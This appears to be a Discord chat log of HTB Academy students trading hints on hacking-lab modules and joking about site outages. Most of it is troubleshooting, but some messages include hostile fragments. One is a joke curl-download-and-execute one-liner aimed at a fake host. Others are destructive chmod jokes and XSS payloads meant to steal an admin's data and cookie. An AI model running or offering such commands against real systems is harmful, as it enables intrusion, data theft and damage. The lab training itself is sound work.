#modules

Section was added recently so it is what it is. Can't blame them for wanting to put some element of reversing in there, but execution could have been cleaner 🤷‍♂️

Will reversing be on the exam? It seems odd that they added a new topic after the exam was already created.

Everyone who has passed it says that whatever is in the modules can show up on the exam, that said, it's a recent addition, so probably less likely. You can never 100% count it out though.

Worst comes to worst, you search ".net binary reversing ippsec/0xdf" and find some walkthrough that they did and follow the steps, they probably wouldn't design any thick clients or binaries that are overly complex, since that's not really what the exam is for

Take anything I say with a grain of salt- all I know is what I read in Discord, I haven't taken the exam

I wish they taught more fundamentals on RE if they are going to include it. I feel like all I would learn from this module is how to pass this particular module.

I found the video from ippsec.rocks...will definitely be going through it tomorrow.

that section is a 1 on 1 copy of the Fatty box official writeup

the ippsec video on that box is great for debugging but i used 0xdf writeup for this (more quick and easy)

I saw something mentioned about Fatty on the VM...so, I should just look up the Fatty box official writeup...okay, awesome, because I don't know how i would get past this on my own

Thick Client is Fatty, the other one is PivotAPI

They merged two boxes

I love how they include material from an Insane level box as if we are all supposed to get it...In my experience so far, it feels like lots of InfoSec training companies assume their students already know as much as the teachers

so far i think this is the only section that done this so you should be good for the other modules

I see, since there are two modules under the attacking thick clients sub-section...you and @vital adder are life savers!

After the AD modules, for the most part everything has been smooth sailing, except for these thick client modules

also in my opinion the main reason this section sucks ass is because the goal of the box is to get RCE but the goal of this section is only getting admin in the client but the section still show the whole process from start to getting RCE which is confusing

yea this channel get that a lot 🤣

So for "Attacking Thick Client Applications" I should be looking at the Fatty writeup and for "Exploiting Web Vulnerabilities in Thick-Client Applications" I should look at the PivotAPI writeup?

the Restart-OracleService.exe binary on Attacking Thick Client Applications is from the PivotAPI box and the fatty-client.jar file on Exploiting Web Vulnerabilities in Thick-Client Applications is from the Fatty box

Okay, that makes sense because the ippsec video seemed to be on the Restart-OracleService.exe

I like to see it as making the stuff in Insane boxes not seem as insane, but for people who have zero rev experience, the section is more confusing if anything

Is it possible to dm someone about Whitebox Attacks "Remote Code Execution"

Hello! I'm having troulbe on the Footprinting module. Sqlplus doesn't seem to exist on the Pwnbox, I keep getting command not found. I tried searching the system for the binary using find and it didn't find anything.

Do I have to install sqlplus myself?

Yes just copy/paste the commands they give you into a bash script

thank you!

hello everyone. I've been stuck on Password Attack Hard Lab for a couple of days now. I was able to find david's credentials and download the .vhd file but I can't mount it or even decrypt it. Would anyone be so kind as to give me a hint?

@inner talon mount the file in windows
and as of decrypting the .vhd file the answer is somewhere in protected archives module

Thanks 🫶

Okay, I think I'm a little stupid. I used a wrong tool , darn me.

#modules message

hello everyone, i've been stuck on Password Attack for Password mutations
"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. "

i already try to use hydra, but i couldn't get anything
i also have created the custom rule like a become 4, etc
can anyone help me ? thankyou and have a nice day 🥰

Attack a different service from ssh

Also use the custom.rules from the resources file

Do not create your own rules

The correct mutated list is ~95k lines

ah i see.. thankyou for your help 😅

i thought i need to create by myself

Sqlplus is supported by oracle that you can enteract with oracle database from console , go to YouTube videos and find one , help you to install it :]

I am having a bit of a technical issue with the Windows Privilege Escalation module ... I am at the Citrix Breakout but the machine is so slow that either it times out or just lags a lot that I have to wait eternity to type one letter ... Is there a tech issue with HTB now?

I'm doing windows privesc module and citrix breakout section. Why i'm stuck here ?

at least you got there ... i am unable to login due to how slow the system is

Try to change vpn server

will try that and see

thanks

is htb working for you?

Hi guys , i need to best plan subscribe within HTB academy to open modules <°

No

Same here

You are suppose to paste the path in File Name Field

yes

Yes I did

yep

down

Are you sure?!

yes

I was in module yeah think down

Yes

ah yes i'm tired

same lol

10000% sure

Is the website down

cuz it'

a random hecker hecked them

loading for a while

I just submitted the last flag and HTB is down

Neither htb is working

HTB pwned???

Same

is it ddos

breakthebox

May be change , and add some futures🥶

HTB pwned indeed

Hhhh

someone escalated from a box

leet hacker

but its cloudflare domain

Who got the root flag

🙃

Root flag? You mean Domain-Admin!

Yeah Lol

It's Cloudflare 100%

cause I got my drug from Amsterdam

Who's been Hacking HTB??? lol

Probably the russians again ffs

Ok , any one get access in htb add for all cubs free 😹

not even supporting our education

just got to a coffee shop 10mis ago to try and do a few hours in peace

darn it

Definitely, It has become the Destroyer of Labs

some kali linux users probably

tryhackme hacked them ig

Nothing wrong

https://www.saashub.com/hack-the-box-status

They are not that good lol

NL?

UK

nice

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Just submit tickets through the help portal

¯_(ツ)_/¯

can i call this Social Engineering

I am from North Korea

narrowed down to 70mil odd people 😉

i try to learn hacking for the government of korea

Social Engineering *

North hihi*

jk im NL servers too

Main site was fine

why are they are not doing sudo systemctl * up

labs is probably too

ayea

labs is down

No

not for me

academy is down

It is for me

Academy

Is down

Deep down

even the main page is down

everything except support is down by the looks of it

no, it's working now

Yep, down for me too

no, it's not

No

Just give it a few

jesus, I just want to go back to hell (htb modules) I want to get that damm flag

Ok, it just loaded 😄

WE NEED IT BACK UP YO NO CAP

back up for me

it works

same

it worked...

yay, time to suffer again. It was a pleasure guys

anyway...

and in all that time my target still didnt spawn....

kali linux user

Ah you are also at the password module

I got the creds for the LSASS module, but then it shut down

Lol I did the exact same thing

noob

anyway

Session Control

#Tools/tmux/session-control
Create a new session:
tmux new -s <name>

Search through history:
Ctrl + d, [ + hjkl for looking through.
And the use of: Page up and Down
copying can be done with SPACE and ENTER
paste this with: Ctrl, d ]

Create a new Window(session):
Ctrl + d, c and Ctrl + d, ',' to rename it.

Switching sessions:
Ctrl + d, <1-9/0> the number of the session.

Nested sessions:
tmux ls show all sessions.
tmux attach -t <session attach the session

Detach a session:
Ctrl + d, d

Join windows/sessions:
Ctrl + d, s + <session-id>

Output history in a log file:
Ctrl + d, alt + shift + P

Show all Tmux bindings:
Ctrl + d, ?

Start a timer:
Ctrl + d, t

Splitting Stuff

#Tools/tmux/splitting-stuff
Horizontal split:
Ctrl + d, "
Vertical split:
Ctrl + d, %

Move splitted sessions:
Ctrl + d, <arrows>

Zoom session:
Ctrl + d, z

Move windows:
Ctrl + d, } to the right
Ctrl + d, { to the left

Change layout looks:
Ctrl + d, space

Terminal Tricks

#Tools/tmux/terminal-tricks
Cycle through history:
Alt + .

Shortcuts:
Ctrl + a begin line
Ctrl + e end line
Ctrl + arrow word by word
Ctrl + D Exit
Ctrl + L Clear

some tmux notes

learn it in the mean time

Nice but who cares

😦

ok want vim notes?

I prefer nano

jeeeeeeeeeeez

noobs. not even a power user

only pro hackers use vim

atleast im glad no one uses emacs

I use Microsoft Word as my IDE

have to have OSCP to be able to close that thing

:q

im oscp certified now

vim has a lesson binary if you install vim

vimtutor

i think

It's back

Hi @fathom pendant. Regarding the question in Attacking Common Services easy lab "You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer." I tried the following:

1. Used the smtp-user-enum tool and found a username starting with f.
2. found what appeared to be default credentials, first tried to login with them using mysql but was not successful an error appeared citing that the password field was empty.
3. tried brute forcing each username found with the password list provided in the resources section on the ftp and mysql ports but this was also unsuccessful.

I saw the mysql reverse shell discussion and correctly if I am wrong. I need to be authenticated before attempting this? or does it work straight from the url bar? Any hints would be appreciated 🙂

nice. goodbye everyone again

if you have Fs creds, maybe retry step 2?

What Hashing protocol is capable of symmetric and asymmetric cryptography? isnt it TLS/SSL ?

Hashing protocol?

yah

hashing is one way

not symmetric or asymmetric

symmetric and asymmetric encryption,

so i dont think that's a hashing protocol

Only have the username of f,that is part of the problem tried brute forcing on mysql but after a certain amount of tries it times out.

if you have the username can you try bruteforcing this?

DM me if you want I done this one on like monday

yay got the flag

Another step closer to active directory module

So I tried to crack the AES hash but I cant. Then I logged into SMB using the ticket, but I am supposed to login to SSH, help lol

which module and section are you on?

Password attacks - Pass the Ticket (PtT) from Linux

question 5? hint wrong file

QUestion 5

yeah

What

Ok

What question is that again?

htb down again ?

yup

yep

wth

ayo btw What group type is best utilized for assigning permissions and right to users?

isn't it SG

about to punch my screen as my proxy wasnt working then i refreshed the page

or Role-Based Access Control

RBAC i think? Using theories such as just in time?

idk d*ck this AD i hate it

not again

come on

or just 777 the entire drive 😉

https://tenor.com/view/no-family-guy-bad-dog-newspaper-peter-gif-9587434

god have mercy

might as well add a suid while your at it

do anyone know the cause like whats going on

never forget to chmod o+x

why its down 2x

sudo chmod / 4777

chmod -R u+rwx /

beautiful

backup

works again

curlhttp://elonmuskmilscheme/ > mal.py && chmod +x ./mal.py && ./mal.py

can anyone see why this isnt working?
The pivot host is available but rdesktop isnt connecting to the port forward?

tried 2 different ports to connect to

Listen IP doesn't match your connect IP.

isnt the listen host the attacking machine?

The listen address is the IP interface to listen on

right yep that works, cheers
thought that was what IP its looking for the incoming connection,
thanks

Pass the Ticket (PtT) from Linux - The only keytab ive found is ||/home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt ||

And apparently thats not the one i am supposed to use

Ive tried ||find / -name *keytab -ls 2>/dev/null||

And I also found these, but I cant use any of them

if i remember right you can only see keytabs as the user that created them unless root

have you tried responder?

I dont see how that would help

Ive found one hash

But I cant use it

WIAT

Lmao

I am stupid

No

hi all, i'm in the module http attacks and i'm stuck in the section HTTP Response Splitting

pretty sure you when you connect to repsonder it can dump the svc hash, but as you got it try pth or cracking it

I was thinking about doing pass the hash, but I cant cuz I am supposed to login with SSH

someone could give me a tip, if possible?

I tried crackinbg it

Didnt work

Aaaa

Wait

did you see what there may be in that "folder"?

I need to use the provided password list

AAaa

Wait

No

I didnt

Lol

DOWN AGAIN ?

You've to add UNC path at the bottom under 'File name' tag

ok its not just me

htb slow

!

And it's down again

damn it

their domain is acticing weird "academy.hackthebox.com"

I got it. Thank you dude!

Welcome...

uhm

Is HTB dead?

Like the website

May add some futures ,and then return

features?

I believe so, I cannot access it either

Yeah it died

but the status website says it's operational: https://status.hackthebox.com/

It probably happend just now

probably not updated the status yet

it's very slow

😭

Any one from htb team here ?!

looks like it came back, I can browse it again

can confirm

The site is work full , without any error 😕

Hello

Im having trouble in the documentation and reporting module, I grabbed the git repo for the tmux plugins and i copied the .tmux.conf file to the right location and gave everything rwx permissions. But when i try to load my plugins i get "/home/kali/.tmux/plugins// is not writable!" Has anyone else had this problem and found a solution? Alternatively, is there something better than tmux for logging terminal sessions?

UPDATE i ran 'sudo chown -R kali:kali /home/kali/.tmux/plugins/' which fixed it i guess, probably not the best way but its a way?

"Alternatively, is there something better than tmux for logging terminal sessions?". I'm not sure this is what you're looking for but have a look at script

Sorry, can you please tell me what wordlist you used to brute force on the vhd hash? the ones I tried didn't work

The module provides lists. Try either this list or the list you have customized in the module

DOWN AGAIN

https://tenor.com/view/office-server-power-lady-unplug-gif-8220789

down for me

You are talking about the HTB site? just tried to get in too.

SOMEONE GOT THE ROOT SHELL THATS WHATS GOING ON

RIP

Hello guys, I'm blocked on the module "ATTACKING WEB APPLICATIONS WITH FFUF", skill assessment at the question "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?".
I got the right page (with the 'You don't have access!' message) but I can't validate it.
Is the format http://domain.domain.htb/path/to/file.ext right for the answer ?

Is it down?

the academy.hackthebox.com site ? No, it return that I do not have the right answer when I try to validate

@wise flare no, it's not like that

The instance and the target

The instance no and the pwnbox, I use my own VM

@wise flare do you have "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains" ?

it's important

I got the right extension (i think)

I retry

yep, one little help

it's one that's different

and unique from the other two

and the format it's http://xxxxx.academy.htb:PORT/xxxxxxx ..etc. the hint they give you

Hi all

someone could help me with the section HTTP Response Splitting ?

i'm stuck in this question : Try to use what you learned in this section to steal the admin user's cookie via XSS.

I have encoded multiple times the special characters to bypass the firewall, but nothing

the idea is pass this GET /?admin=/?target=http://10.10.14.x:9000/script.js HTTP/1.1 to the admin, and when the admin access it will access my xss that will stole his cookie

but there a firewall that a need to bypass, the hits is:

hint:
Hint

Certain special characters need to be URL encoded multiple times. There is a firewall in place that prevents the admin user from accessing any external endpoints!

Ok.... I needed to replace the port by "PORT" ....

Ty

no, just use the port they give you

I replaced and the answer got accepted but with my port, no

weird

btw, that will take a while

you can curl o just go the webpages

did you know that the OSI model has 7 layers? @wise flare

you understand

yes

?

(replaced to validate the answer on academy.hackthebox.com)

I'm the only that have this error?

no

i have the same problem

Oh okay, thx

Does anybody know how to solve this problem in "Attacking Coldfusion" in Attacking Common Applications?

It doesn't get the shell, it keeps listening... (parameters should be fine)

)

What are people's preference for O/S's Kali or Parrot???

Kali

By a mile

lol

(Personally)

I have both but finding I need to install more on Parrot and even can't install some things on Parrot

For that exact reason I like kali more

KALI

I dont take notes of the execises I do, do I have to recrack the password, if I remember correctly it will take me 30 minutes and aaaaaa

Did you not submit the pw in the previous section?

No

I submitted a flag, but I had to get the password to get the flag

Ok

Recracked it

it was faster than i remember

lol

I use Kali and I am satisfied with it. Never used Parrot before so have no opinion on it.

Can someone tell me, how long there will be promo for silver annual -100 eur?
Cuz I have rent 10 semteber

Idk what happens the commands dont work for me 💀 🥲 in "Ataccking SQL Databases"

That first SQL command should return a list of users you're able to impersonate. Since it doesn't return anything, you can't impersonate anyone.

@trail leaf that's the problem right there, in the exercise they guide you based on that and asking other people on the community thats the way to go. So why isnt it working for me 😭

What does this mean?

We can view which privileges we have using the SHOW GRANTS command be discussed later.

https://dev.mysql.com/doc/refman/8.0/en/show-grants.html

but that sentence does not make any sense

"command be discussed later."

Somone can help me? I tried with all the subdomains wordlist

You need to find all zones

ah..

thx hahhahah

I think the sentence means that this command will be discussed later.

What exactly have you tried?

All the wordlist in SecList/DNS with the inlanefreight.htb domain

hello anyone can have an idea what could be happening here:

╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack ╰$ cat ssh.hash id_rsa:$sshng$1$16$F1C2E21F3CF7BDF460FB56C7D16911F2$1776$b2a5e7a6de9f3785208b9e39086c8f5a07...SNIP....89b922aafeba78ad22cd50bf9252a04941166e2039d55dc8a4a9268d5930d4 ╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack ╰$ john --wordlist=rockyou.txt ssh.hash No password hashes loaded (see FAQ)

I genuinely don’t remember using the impersonate stuff there specifically, and based on the answers I have written down, you don’t need that for the exercise

That said, they probably should have a user you can impersonate just for practice

Why?
This zone allows a zone transfer. It gives you all the data voluntarily.

ohu shit, true. I'm so dump

your john may be out of date or the key you are attacking may be unsupported, though you'd see a message if recognized and unsupported

add --format=SSH to your command maybe and see if that changes the behavior

ok., ty I'm gonna try it

hey guys can i ask you

i bought academy gift card and i want to buy platinum subscription with that money how can i do that

anyone !!

I have used both, parrot is much more stable on older hardware. I can do evil twin using my integrated wireless adapter that wasn't possible on kali

can someone answer me

currently using kali on my PC and Parrot on laptop

Can anybody guide me in the right direction? In the "Attacking Common Services - Easy" I can't get a valid user name when I try the usernames.list provided, and then when i try a list from Seclist i get a lot of "valid users" that don't work like "bob, public, demo...". Please if could would help i'd apreciate

good day friends, i am at SQLMap Essentials case 6, i spent hours without a hit, it says that col is not injectable and starts with other parameters, i tried with --level=5 ,--prefix='%27%29' and --prefix="')", any hint please

╭─gsbuosi@samsung in ~/Documents/HTB/Academy/PasswordAttack ╰$ john --format=SSH --wordlist=rockyou.txt ssh.hash Unknown ciphertext format name requested ╭─gsbuosi@samsung in ~/Documents/HTB/Academy/PasswordAttack ╰$ john --wordlist=rockyou.txt ssh.hash --format=SSH Unknown ciphertext format name requested

Yeah, looks like your john is very out of date

or potentially it was built with limited environment?

how can I know if that is true?, and how can update it?

either grab binaries from the openwall website or build from the repo?

yesterday at night I did this:

git clone https://github.com/openwall/john -b bleeding-jumbo john
cd john/src/
./configure
make -s clean && make -sj4

yeah, looks like you built in a limited environment then

not the right place #job-postings

when you ran ./configure it should have showed features that were enabled/disabled based on your environment

ok., how can I fix it?

you need to resolve those environmental issues

holy moly ....

can I DM to not make noise here?

actually it might be good to do here in case someone else has the same issue

that way they can search for the answer

ok., got it

when you mean, environment issues, are you meaning this:

Configured for building John the Ripper jumbo:

Target CPU ......................................... x86_64 AVX, 64-bit LE
AES-NI support ..................................... run-time detection
Target OS .......................................... linux-gnu
Cross compiling .................................... no
Legacy arch header ................................. x86-64.h

Optional libraries/features found:
Memory map (share/page large files) ................ yes
Fork support ....................................... yes
OpenMP support ..................................... yes (not for fast formats)
OpenCL support ..................................... no
Generic crypt(3) format ............................ yes
OpenSSL (many additional formats) .................. yes
libgmp (PRINCE mode and faster SRP formats) ........ yes
128-bit integer (faster PRINCE mode) ............... yes
libz (7z, pkzip and some other formats) ............ yes
libbz2 (7z and gpg2john bz2 support) ............... yes
libpcap (vncpcap2john and SIPdump) ................. yes
Non-free unrar code (complete RAR support) ......... yes
librexgen (regex mode, see doc/README.librexgen) ... no
OpenMPI support (default disabled) ................. no
Experimental code (default disabled) ............... no
ZTEX USB-FPGA module 1.15y support ................. no

Install missing libraries to get any needed features that were omitted.

Configure finished. Now "make -s clean && make -sj4" to compile.

Install missing libraries to get any needed features that were omitted.

yes, that would be part of it

however it does look like you have OpenSSL which is the dependency i would have expected for the SSH format

so perhaps that format is in experimental still

though i wouldnt expect it to be

ok., my main concern is how I Install missing libraries to get any needed features that were omitted.

from there, i would make clean, and make again

and see if the format is present after

also, looking back at your commands

Just finished Password Attacks:

• Very interesting course that introduces a lot of AD concepts, alongside passwords
• I felt like the course was much more difficult than the skill assessments

https://academy.hackthebox.com/achievement/737/147

you ran john from an installed path

and you compiled john to a local binary

so you are probably running some ancient installed version of john that is different from the locally compiled binary

which will cause even more confusion/conflicts here

when creating a reverse shell with the pwnbox, what IP do I have to put in the script? I used hostname -i to get 127.0.1.1 so a localhost IP and the reverse shell did not work

module is Getting Started - Nibbles - Initial Foothold

Use tun0 ip

ip a, see tun0 (your vpn interface IP)

thanks

Hi someone have problmes with first asset in ABUSING HTTP MISCONFIGURATIONS? I tried diffrent payloads like:

<script>window.location.href = 'http://94.237.48.48:39725/index.php?language=pepe&content=test';</script>
<script>var xhr = new XMLHttpRequest();xhr.open('GET', 'http://94.237.48.48:39725/admin.php?reveal_flag=1', true);xhr.withCredentials = true;xhr.send();window.location.href = 'http://94.237.48.48:39725/index.php?language=pepe&content=test' + encodeURIComponent(xhr.responseText);</script>

But doesn't work

I have been able to verify that even the admin does not enter in http://94.237.48.48:39725/index.php?language=de

why is the SQL Operators section AFTER this question? https://academy.hackthebox.com/module/33/section/191

😭

Hey!
I wonder if someone can help me. I’m looking at the IPMI section of the Footprinting module.
In the output from nmap, how can one identify if anonymous authentication is enabled?
Would it be under:
PassAuth: anonymous_user
Or under UserAuth?

If it says “UserAuth: null” what does that mean?

Similar to this:

every time i dump hashes and see "mrb3n" account hash, the urge to push challenge through my 🥜 cracker 🤣

RDP and SOCKS Tunneling with SocksOverRDP

I have loaded the dll and turned off windows defender. why am i getting this error??

As has been answered COUNTLESS times in this channel: there is another protection service that runs in real-time

Not poweshell RealTimeMonitoring?

Real-Time-Protection

Yes I had already turned real time protection off and Set-MpPreference

More specifically (just to be sure) which system are you trying to access, and which are you on?

There are 3 systems, you have creds for all

Foothold, jump(1), target

oh is there a jump between the foothold and target?

Yes

Follow the section

right got it, was getting confused

cheers

was trying to go pivot > target, but i get what its asking now

After that it's pretty straightforward

cheers

Hey folks, looking for some help on the Footprinting Lab - easy

I am able to ftp in to the proxy 2121 and see the hidden files and folders using ls -a

also changed the permissions to for read write and execute

but I am unable to download them to my parrot vm

Check the permissions for the folder you're downloading to

https://drive.google.com/file/d/1XgvFfjziUl0o_szyn8fC083poERe1VeI/view?usp=sharing

the permissions for .ssh are all read write execute

What is that drive link

trying to share a snip of my screen

Just verify your main htb account following instructions in #welcome

Thats better, thank you

I try downloading using get and mget

nada

what dumb step am I missing here?

What directory are you launching ftp from? Is it a restricted directory like root?

yeah the error is telling you its from the local side

Doh

I’ll try it when I get back, not enough sleep

Thank you!

ok, how was attacking common services -medium easier than easy? Rhetorical question, but if there is actually a narrative to this, be interesting to hear.

Doing Abusing HTTP Misconfigurations: Password Reset Poisoning { https://academy.hackthebox.com/module/189/section/2014 } , and after forwarding the request the interactsh.local i am able to see Override Headers such as : X-Forwarded-Host X-Forwarded-For X-Forwarded-Server and the hint points me toward utilizing them

and i just don't know how to do so, and I have tried couple of things with no success

any help is well appreciated !!

Because easy puts you in the mindset of where you need to be

nah theyre just flipped for some reason

I mean

Most easy/med labs seem flipped

If we're gonna break it down lol

Hi Guys! Im having issues with "Pass the Ticket (PtT) from Windows" on the very first question i cant connect via RDP to the IP assigned with provided credentials, I did reset the IP multiple times but no luck :S how can I get help to solve it?

Either way it made me do a lot of research and learned many new things.

Solved

I'm working on Footprinting/SMTP

I'm struggling to get nmap to accept more than one argument for scripts.
||nmap --script smtp-enum-users --script-args userdb=/home/users.lst,smtp-enum-users.methods={vrfy} 10.129.253.190 ||

It seems to recognize that there are two arguments, but it only ever uses one of them.

I resorted to going over the list manually to finish the exercise 😦

For the smtp footprinting I only needed one script

smtp-enum-users

I'm only using one. But two arguments

hello guys, I'm using mac m1 chip now i want install kali Linux in my host. is there any way to install arm kali in my host machine.
i tried to install arm in utm but it was not installed

--script-args smtp-enum-users.methods={VRFY}

I believe that is the only arg you need

What about the user list? The correct username isn't in the default list

It's supplied in a file as part of the exercise

sudo nmap -p25 --script smtp-user-enum -M VRFY -U /usr/share/dirb/wordlists/big.txt -t 10.129.42.195 -v

It isnt that wordlist from memory

I have this in my notes trying to remember how I solved it

but I believe the syntax is similar to the above

Interesting. That is not the syntax I found on nmap.org

https://nmap.org/book/man-nse.html

Shows the syntax. Maybe I need quotes around everything

But in the image I sent, it appears to recognize both of them, so I don't know what I'm doing wrong, really.

I just checked; you want to use this wordlist

/usr/share/dirb/wordlists/big.txt

if you figure out the syntex you got is

The word list is supplied in the exercise

sure it is 🙂

I've already done it manually for the answer, I just want to figure out how to get it working.

It is. It's the resources file for that module. The hint even tells you to use it.

I had to run it with the big.txt wordlist anf finally got it

But I can't get nmap to use the vrfy method and the list at the same time which annoys me

You can just use smtp-user-enum.py

BTW

Script arging in Nmap is just a needless pain

smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1

It that what we are looking for, I did this last week just took horrible notes

That's what I recall doing

Where did you find -M -U as being usable?

I believe I managed to get Nmap to work after several hours of trial and error. Which felt pointless

-M == method
-U == {username.list}

I get that. Not what I'm asking

That syntax isn't on nmap.org

How did you find it / where can I see it?

We are talking about the actual smtp-user-enum.py

not the Nmap script

Oh, I don't know what/where that is either

I was using the nmap scripting engine

It should be installed and be in your default path just Start typing smtp-user- and hit tab

Interesting I'll look into it

Would still like to figure out nse though

Hey did you solve it? Can I DM you?

I have admin rights via CMD prompt and PS. How can I check the NTLM hash of a certain user?

@cunning obsidian dms?

mimikatz?

i am having trouble copying it to the target windows machine

I already used scp to put it on the linux attack host

anyone known why the ssh to the target box from the pwnbox is so unstable?, every time that I establish a ssh session and try to setup a python web server is frozen, unfortunately I can't crack the hashes with my Linux machine and I'm using the HTB pwnbox but it's driving me nuts.....

I'm trying to get the clear text pwd for a user with the reversible encryption enabled

Hi All,

Hope some one can help me in "Shells & payloads - The live engagement - host #1"

After RDP to the Foothold system, I can't see any browser application in Parrot OS. Kindly let me know if this is expected.

Type firefox in terminal

@lone hamlet you have to rdp the ip that they give you, and then you can start atacking from that machine

@lone hamlet the ip's that you must atack are in the Target Hosts image

@lone hamlet and don't forget the hints, they're very important

In the web attacks module, Local File Disclosure.
Attempting to read the connection.php file
It looks to me that the expect command is disabled becuase I cannot even do basic commands like id or whoami.
Where the hint suggest to use PHP filters - which suggest if you obfuscate the command it should work, but I cannot et anything going in my favor.
Some assistance would be greatly appreicated.

File disclosure does not equal code execution. You can read files with it but you can't run commands. The idea is that you can use it to read sensitive data (like the source code or files containing credentials like a connection.php) and then do something with that new knowledge

I do understand that but there is also in the same section parts about "Remote Code Execution with XXE"
And with the IP of the target machine being accessible on the VPN compared to all the other tasks being an online task - that suggests towards the information given in the RCE part of this section

and ofcourse the standard as soon as you submit to discord you work it out yourself. I swear I submit the read w/ base64 thing soooo many times.

but the hint hints towards using php://filter/ no?

but now it suddenly works =/

haha, maybe a typo somewhere

More than likely, appreicate your help anyway mate 😄

https://discordapp.com/channels/473760315293696010/1138879672717942804/1138879672717942804

any help please

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...)) i am stuck here for a long time

could you give more context? Were you able to perform a "zone transfer"?

i use the dig axfr inlanefreight.htb @rustic sageurl

anyone on SQL injection fundamentals.. Just asking for help on how to log into the inlanefreight on the skills assessment

from the output got from the zone transfer did with dig, if everything went in the right way, you should be able to see additional "targets". Proceed from there

The lesson also talks about a different (similar) zone transfer

why am i geting ldap_sasl_interactive_bind: Can't contact LDAP server (-1)

when running ldapsearch

Hi can someone give me a hint for "Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer." from INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC. I tried different search querys but nothings seems to work.

i am moving on , i can't find it

It's right under the transfer you've already done

|| internal zone transfer ||

I cant crack the zip hash, ive tried 5 different wordlists

hi in kerberos Attacks - Skill Assessment i got the initial credential but i cannot connect in anyway to server01 for enumerate the domain. can anyone can help with this??

But i guess ill just have to try harder lol

5 lists?
A list is provided in this module. In the course of the module this list is edited.
So there is a maximum of two lists you can try

AAAAAA

I remember now

I changed my mut password list

Yes, i made it 400 lines instead of 94k

lol

Why 400?

Because I changed it to bruteforce the kira user

Lol most suggestions were to remove the first 17k

Then create a copy and change it lol

And I forgot to change it back, so i did hehe

Yesh indeed, ive got the flag now xd

has anybody else had problems using ligolo-ng on the first jump box of "attacking corporate networks"? - it seems to completely strangle the poor thing

when to use the htb and htb academy effectivly

which module and section are you on? also i did used that tool or Offshore so if you need help with that feel free to dm me

go to htb after full job role path or after modules

Attacking Enterprise Networks - doing it blind

nice same but i haven't re-do my sucks ass note for it so let me give the pivoting thing a check

Ill just use ssh for now

sorry for the wait but i got a working ligolo-ng agent on the jump box and everything seem to be working fine for me (without root)

thank you very much

if that screenshot alone help then np 👍 but if you still need help with that feel free shoot me a dm

it told me its a me problem and not a box problem

also i did wrote a quick "section" on using ligolo-ng double pivot but the head of the academy haven't reply to that ping so if you or anyone want to give have a check and give me some feedback shoot me a dm

If this is too much information, I’ll delete the post.
Remember to have a look at the cheatsheet that goes along with the footprinting module, have you tried all the commands for the FTP service?

need some help for the Exploiting Web Vulnerabilities in Thick-Client Applications

https://academy.hackthebox.com/module/113/section/2164

I have decompile the jar file using JD-GUI, but when I compile the .java file, it won;t work

shoot me a dm

yo guys, i got stuck on this question in Linux fundamentals: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

it tells me that the address is unreachable

what can i do?

can you paste the curl request?

Thanks a lot

i dont quite understand what do you mean

do you mean the output it gives me after it tries to reach the web?

the command

just simple "curl https://www.inlanefreight.com"

well it should work

I tried to bruteforce user root on password skill assessment easy, it didnt work (Bruteforcing root on ssh) and bruteforcing all the usernames with the mut wordlist for ftp (Nvm crackmapexec didnt work that time, now it does)

Hello everyone,

I've been working on the password module for the past five days, but unfortunately, I'm facing a challenge due to the ***** RDP connection constantly resetting every second. This is causing a significant disruption in my progress.

Attacking Common Services - Easy -> i'm on the final step so i upload the shell, now how can i open it? when i go to the http://targetip/shell.exe it just download it any hint? Maybe is a easy step but i'm on this like for hours cant think to much xd

You should check the supported languages for a webserver. I don't think a webserver can execute a .exe file.

If the webserver is able to run php then get a php shell, if runs aspx then get a .aspx shell

yeap got it, like i said to many hours on this xd thx 😄

I lost my temper

iam afraid may be i brake my laptop

NP

Maybe it's your RDP client, have you tried changing it?

next time just bang your head against a wall 🤣

jk but which section and question are you on?

ooooh rely Do you thing i didn't change it

Password attacks

i mean the section and question?

Password attacks is too lengthy lol

from the rdp thing i'm guessing question 3 on Network Services?

some of the section is too damn long but some of them you can cut like the first 17K password off to make it faster

I am doing the easy skill assessment and i have no clue what username is avaliable

nO
Credential windows Hunting

so i am trying it with the short list (203 passwords per user)

if you have windows machine use it cuz it will use your gpu while cracking the hash makes it much quicker than in VM

I am not cracking a hash

I am bruteforcing FTP

but yeh

oh i see my bad

oh ok which question?

have you tried increasing the threads?

The thing is

idk

if ftp might reject it

lol

something isn't right here

I tried using crackmapexec and it took like 2 minutes to scan the 97k passwords for all the users, but none of them hit

so now

I am thinking that i was doing the scan too fast

so i am doing a slower one

with the 200 passwords

And indeed

I got the password just now

Lol

hey wtf
even when i tried to connect using winrm

it took 3min
and every command hang out

wtf they should extend my voucher 1year

`S C:\tools> ls

Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired

Error: Exiting with code 1`

I am considering changing my major to become a nurse,

first if you are having connection issue make sure you don't have both your vpn and the pwnbox on at the same time and if you are using the vpn try changing the vpn server and if you are on the pwnbox HTB academy recently have some down time so thing maybe a bit slower than normal and finally if you have Silver Annual you have 1 on 1 tutoring so if you suspect the issue is an internal one you can discuss it with your tutor

or a doctor like johnny sins

i have no idea what you mean by that but if the spoiler thing is you have to run that command against the DC to the user in the question then there is other ways of finding the user not the exploit part

also if you can't discuss this without spoiler then feel free to shot me a dm

Password attacks easy, I cannot find root's password (||I am guessing that I am not supposed to brute force since I got the user mike||)

I got nothing from this scan lol

hint do some basic enum for privesc

aaaa ok

